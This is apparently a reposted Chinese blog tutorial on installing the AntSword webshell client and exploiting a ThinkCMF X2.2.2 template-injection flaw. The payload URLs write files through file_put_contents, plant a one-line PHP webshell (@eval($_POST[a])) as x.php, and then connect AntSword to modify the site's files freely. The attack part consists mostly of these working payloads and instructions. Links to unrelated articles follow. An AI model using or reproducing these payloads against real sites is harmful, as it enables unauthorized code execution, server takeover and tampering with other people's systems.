蚁剑安装以及使用方法

蚁剑安装以及使用方法一 蚁剑如何安装蚁剑安装分两个步骤一个是下载源代码 还有一个加载器 用加载器去加载源代码 下载的的文件路径一定要记得蚁剑源码下载 https github com AntSwordProj antSword 蚁剑加载器下载 https github com AntSwordProj AntSword Loader 下载之后解压缩之后是这样的点击 AntSword Loader v4 0 3 win32 x64 这个文件打开 AntSword exe 点击初始化点击初始化点击选

一、蚁剑如何安装

蚁剑安装分两个步骤一个是下载源代码,还有一个加载器,用加载器去加载源代码,下载的的文件路径一定要记得
蚁剑源码下载:https://github.com/AntSwordProject/antSword

在这里插入图片描述

蚁剑加载器下载:https://github.com/AntSwordProject/AntSword-Loader

在这里插入图片描述

下载之后解压缩之后是这样的

在这里插入图片描述

点击AntSword-Loader-v4.0.3-win32-x64这个文件打开AntSword.exe

在这里插入图片描述

点击初始化

在这里插入图片描述

点击初始化点击选择antSword-2.0.3
antSword-2.0.3文件夹是代码(源码)的文件夹

在这里插入图片描述

之后再打开AntSword.exe

在这里插入图片描述
在这里插入图片描述

打开以后是这样的

在这里插入图片描述

二、构造payload上传文件

我这里使用的是ThinkCMF X2.2.2框架搭建的网站,等下用这个网站测试一下。
先用这句代码测试一下网站
点击回车

在这里插入图片描述

如果什么都没有显示说明上传成功.

在这里插入图片描述

分析一下上传的代码
?a=fetch&templateFile=public/index&prefix=''&content<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php> 

这里我们主要看一下后半句

file_put_contents(‘test.php’,’<?php phpinfo(); ?>’)

file_put_contents 
现在测试一下上传的代码是否能执行。

三、上传一句话木马文件

这里我构造的代码是

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('x.php','<?php @eval($_POST[a]); ?>')</php> 

这里注意里面的a参数不要加单引号,因为前面有单引号,不然就闭合的单引号会报错。

这里的说一下后半句代码

file_put_contents(‘x.php’,’<?php @eval($_POST[a]); ?>’)
这里x.php是上传的文件名

<?php @eval($_POST[a]); ?>这一句@表示抑制错误,eval是执行函数,POST代表的是传参的意思

接下来上传代码

在这里插入图片描述

四、蚁剑连接

这里是网站首页地址加一个/后面跟着文件名
列如:http://192.168.36.35:8002/x.php

在这里插入图片描述

点击添加

在这里插入图片描述

点击文件管理

在这里插入图片描述

接下来就可以对网站里的文件随意改动。

在这里插入图片描述

从入门到入狱:网络安全法

在这里插入图片描述

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/231482.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • Redis常用命令–set

    Redis常用命令–set

    2022年2月19日
    38
  • Java实现数组反转翻转的方法[通俗易懂]

    Java实现数组反转翻转的方法[通俗易懂]Java实现数组反转翻转的方法  【尊重原创,转载请注明出处】http://blog.csdn.net/guyuealian/article/details/51112971   数组翻转的方法(java实现),数组翻转,就是将数组倒置,例如原数组为:{“a”,”b”,”c”,”d”},那么翻转后的数组为{“d”,”c”,”b”,”a”。  【方法一】使用集合个工具

    2022年4月30日
    51
  • MAC Unity安装教程「建议收藏」

    MAC Unity安装教程「建议收藏」缘起这边app要做一个简单调研,验证是否可以利用unity改善app中h5页面需要展示的3d和复杂报表效果。于是就此开始了调研,这边只是想简单将unity集成到工程中,然后想办法嵌入h5来进行展示测试。安装地址https://unity3d.com/cn/get-unity/download/archive这里根…

    2022年6月27日
    150
  • 什么叫做解析几何_笛卡尔心形函数

    什么叫做解析几何_笛卡尔心形函数解析几何是进行科学研究的重要的数学工具。比如说,要确定船只在大海中航行的位置,就要确立经纬度,这就需要精确的掌握夭体运行的规律;要改善枪炮的性能,就要精确地掌握抛射物体的运行规律。解决这些问题必须采用解析几何。因为它可以利用字母表示流动坐标,用方程刻划一般平面的曲线。解析几何的发明人就是伟大的数学家笛卡尔。笛卡尔15%年出生在法国,父亲是一位相当富有的律师。8岁时,父亲把他送进荃督教会学校读书。他…

    2022年10月10日
    4
  • sql语句根据某个字段去重_根据两个字段去重

    sql语句根据某个字段去重_根据两个字段去重deletefromaop_app_ipmlinfoawherea.impl_idnotin(selectmax(t.impl_id)cfromaop_app_ipmlinfotgroupbyt.app_id,t.ability_id)ps:max(t.impl_id)也能替换为min(t.impl_id)

    2025年6月19日
    4
  • py2app打包「建议收藏」

    安装cndevOE运行时依赖的库:1.安装python运行环境下载python-2.5.1-macosx.dmg,安装。打开终端,输入python看到version是为2.5.1,安装成功。2.安装wxPython下载wxPython2.8-osx-unicode-2.8.9.1-universal-py2.5.dmg,安装。打开终端,输入python,在shell下输入:im

    2022年4月8日
    47

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号